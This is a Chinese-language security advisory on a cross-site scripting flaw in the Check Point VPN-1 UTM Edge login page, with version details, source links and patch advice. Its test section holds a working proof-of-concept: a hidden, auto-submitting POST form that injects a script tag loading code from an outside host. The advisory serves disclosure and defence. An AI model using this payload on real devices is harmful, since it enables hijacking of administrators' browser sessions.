发布日期：2008-03-06
更新日期：2008-03-07

受影响系统：

Check Point Software VPN-1 UTM Edge NGX 7.0.48x

不受影响系统：

Check Point Software VPN-1 UTM Edge NGX 7.5.48

描述：

---

BUGTRAQ  ID: 28116

VPN-1 UTM Edge是集成了防病毒、防火墙、入侵防护和VPN技术的安全接入解决方案。

VPN-1 UTM Edge的管理界面在处理用户请求时存在漏洞，远程攻击者可能利用此漏洞执行跨站脚本攻击。

VPN-1 UTM Edge的登录页面没有正确地过滤user参数便返回给了用户，这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。由于设备不接受GET请求中的参数，因此攻击者必须要使用POST请求来利用这个漏洞。

<*来源：Henri Lindberg （henri.lindberg@louhi.fi）
  
  链接：http://secunia.com/advisories/29243/
        http://marc.info/?l=bugtraq&m=120483120818369&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">

<input name="user" value="'&lt;script/src=//l7.fi&gt;&lt;/script&gt;">

</form>
</body>
</html>

建议：

---

厂商补丁：

Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.checkpoint.com

浏览次数：2454
严重程度：0（网友投票）